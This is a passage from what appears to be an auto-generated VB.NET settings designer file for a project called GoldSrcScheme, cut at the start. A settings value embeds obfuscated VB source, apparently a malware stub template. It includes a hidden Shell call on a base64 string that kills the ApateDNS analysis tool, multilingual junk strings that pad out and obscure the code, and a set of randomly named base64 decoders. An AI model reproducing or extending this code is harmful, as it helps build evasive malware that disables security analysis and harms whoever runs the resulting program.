            "dedeಲ್ಜೋwಯಲ್ನಲ್ಲಿ今ಲ್ಲಿ As String = ""ಒಂದುಯಿಒಂದುರೀತಿಯಜೋಯddeಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂ"& _ 
            "ದು ರೀತಿಯ ಜೋಯಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Shell(OLBkiXmTJFttIYOWbPYNpgv(""dG"& _ 
            "Fza2tpbGwgL0YgL0lNIEFwYXRlRE5TLmV4ZQ==""), vbHide)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 链接链ee接链接frfrfrf链接"& _ 
            "今ಲ್ಲಿ As String = ""病毒纳杰夫e33r4r这里病毒纳杰夫这里病毒r4r44r纳杰夫这里病毒纳杰夫这里"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim 바이러스나e"& _ 
            "eefrfr자프여기今ಲ್ಲಿ As String = ""वायरस यहाँ नजफवायरस यहाँ नजफवा4r4r4rयरस यहाँ नजफवाय"& _ 
            "रस यहाँ नजफ"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim वायरसनजफकिंवदंती今ಲ್ಲಿ As String = ""俞日元延p广播特贝俞日元延p广播r4r"& _ 
            "4r4特贝俞日元延pr4r4r广播特贝俞日元延p广播特贝"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim ಒಂದುಯಿಒಂfrfrfದುರೀತಿಯಜೋಯಲ್ಜೋಯಲ್ನಲ"& _ 
            "್ಲಿ今ಲ್ಲಿ As String = ""ಒಂದುಯಿಒಂದುರೀತಿಯr4r4ಜೋಯಲ್ಜೋಯಲ್ಒಂದುಯಿ ಒಂದು ರೀತಿಯ ಜೋಯ"& _ 
            "ಲ್ ಜೋಯಲ್ ನಲ್ಲಿನಲ್ಲಿ"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim ಬೆಟ್ಟಿಸ್ಯೂಸ್ಬೆfrfrfrಟ್ಟಿಸ್ಯೂfrfrfrಬೆಟ್ಟಿಸ್ಯೂ"& _ 
            "ಸ್ಸ್今ಲ್ಲಿ As String = ""这里病毒纳这里病毒纳杰r4r4r4夫这里病毒纳杰夫杰夫这里病毒纳杰夫"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    End Sub"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Dim"& _ 
            " 今天之后没有慈悲今天之后没有慈悲今ಲ್ಲಿ As String = ""आज के बाद कोई दया नहींआज के बाद कोई दया नहीं"& _ 
            "आज के बाद कोई दया नहीं"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Dim 阿忆在A型乔阿忆在A型乔尔乔尔尔乔尔今ಲ್ಲಿ As String = ""एक यी एक प"& _ 
            "्रकार योएल योएल परएक यी एक प्रकार योएल योएल परएक यी एक प्रकार योएल योएल पर"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"   "& _ 
            " Dim 今天之后没有慈悲今天之后没有慈悲 As String = ""आज के बाद कोई दया नहींआज के बाद कोई दया नहींआ"& _ 
            "ज के बाद कोई दया नहीं"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Dim 阿忆在A型乔阿忆在A型乔尔乔尔尔乔尔 As String = ""एक यी एक प्रकार "& _ 
            "योएल योएल परएक यी एक प्रकार योएल योएल परएक यी एक प्रकार योएल योएल पर"""&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Pub"& _ 
            "lic Function OLBkiXmTJFttIYOWbPYNpgv(ByVal eSAgnfEoKeNrPONFD As String)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"       "& _ 
            " Dim gtswVBBgQXpSrsRrT As Byte() = Convert.FromBase64String(eSAgnfEoKeNrPONFD)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)& _ 
            "        Dim jYmPEVwYVQTqVZWgj As String = System.Text.Encoding.UTF8.GetString(gt"& _ 
            "swVBBgQXpSrsRrT)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Return jYmPEVwYVQTqVZWgj"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    End Function"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Publ"& _ 
            "ic Function KQrOrTHOAOrMrNgiJHrNaIq(ByVal RDJrWeOYUUfQFcBdF As String)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        "& _ 
            "Dim CusnrCDPbSTQhqtSj As Byte() = Convert.FromBase64String(RDJrWeOYUUfQFcBdF)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&" "& _ 
            "       Dim FZnGaWBIhLuoLXAIC As String = System.Text.Encoding.UTF8.GetString(Cus"& _ 
            "nrCDPbSTQhqtSj)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Return FZnGaWBIhLuoLXAIC"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    End Function"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Publi"& _ 
            "c Function eHCfeVDhiFEotZRQTRNrEWe(ByVal LUPcKeAuarwhfAISI As String)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        D"& _ 
            "im oNsGPsUOmFNurHvlt As Byte() = Convert.FromBase64String(LUPcKeAuarwhfAISI)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"  "& _ 
            "      Dim qonWvOSGsvoVVlCbM As String = System.Text.Encoding.UTF8.GetString(oNsG"& _ 
            "PsUOmFNurHvlt)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Return qonWvOSGsvoVVlCbM"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    End Function"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Public"& _ 
            " Function BuKvRXwETsOSvmCuecfXfjR(ByVal qkfLGVKkgEVIcFwBo As String)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Di"& _ 
            "m sPabmpIcluwfGjEnH As Byte() = Convert.FromBase64String(qkfLGVKkgEVIcFwBo)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"   "& _ 
            "     Dim GXuhgGTsBNYUSZhKJ As String = System.Text.Encoding.UTF8.GetString(sPabm"& _ 
            "pIcluwfGjEnH)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Return GXuhgGTsBNYUSZhKJ"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    End Function"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Public "& _ 
            "Function VlSPFZsXEjYuABjconAEJwE(ByVal GAdbdGSnnRePtqscs As String)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim"& _ 
            " JbYrMaQftKJmYXARL As Byte() = Convert.FromBase64String(GAdbdGSnnRePtqscs)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    "& _ 
            "    Dim lUEVRnkwHVXDjenlw As String = System.Text.Encoding.UTF8.GetString(JbYrMa"& _ 
            "QftKJmYXARL)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Return lUEVRnkwHVXDjenlw"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    End Function"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Public F"& _ 
            "unction SpLqOUNSsrVNjnFoWfUErZA(ByVal IltfApfNePnYQKilt As String)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim "& _ 
            "LQnvgMdFkISwronaM As Byte() = Convert.FromBase64String(IltfApfNePnYQKilt)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"     "& _ 
            "   Dim VXKEaaoVAYqlFfTuN As String = System.Text.Encoding.UTF8.GetString(LQnvgMd"& _ 
            "FkISwronaM)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Return VXKEaaoVAYqlFfTuN"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    End Function"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Public Fu"& _ 
            "nction mgTKBWJldifplDnVgqmhVmk(ByVal ePTCIdnGHDJMkoJbH As String)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim p"& _ 
            "XnJCsCWTTiBwemvI As Byte() = Convert.FromBase64String(ePTCIdnGHDJMkoJbH)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"      "& _ 
            "  Dim rCiZiOAOZMMZaLrkY As String = System.Text.Encoding.UTF8.GetString(pXnJCsCW"& _ 
            "TTiBwemvI)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Return rCiZiOAOZMMZaLrkY"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    End Function"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    Public Fun"& _ 
            "ction JWbalYFIOYpTnPXDrEIOwDY(ByVal fOaeOOJrYFkqsqqdN As String)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Dim ip"& _ 
            "VuuiGjevOQWXvSd As Byte() = Convert.FromBase64String(fOaeOOJrYFkqsqqdN)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"       "& _ 
            " Dim lUQNdEEbjopoAECIt As String = System.Text.Encoding.UTF8.GetString(ipVuuiGje"& _ 
            "vOQWXvSd)"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"        Return lUQNdEEbjopoAECIt"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"    End Function"&Global.Microsoft.VisualBasic.ChrW(13)&Global.Microsoft.VisualBasic.ChrW(10)&"End Module")>  _
        Public Property c() As String
            Get
                Return CType(Me("c"),String)
            End Get
            Set
                Me("c") = value
            End Set
        End Property
    End Class
End Namespace

Namespace My
    
    <Global.Microsoft.VisualBasic.HideModuleNameAttribute(),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute()>  _
    Friend Module MySettingsProperty
        
        <Global.System.ComponentModel.Design.HelpKeywordAttribute("My.Settings")>  _
        Friend ReadOnly Property Settings() As Global.GoldSrcScheme.My.MySettings
            Get
                Return Global.GoldSrcScheme.My.MySettings.Default
            End Get
        End Property
    End Module
End Namespace
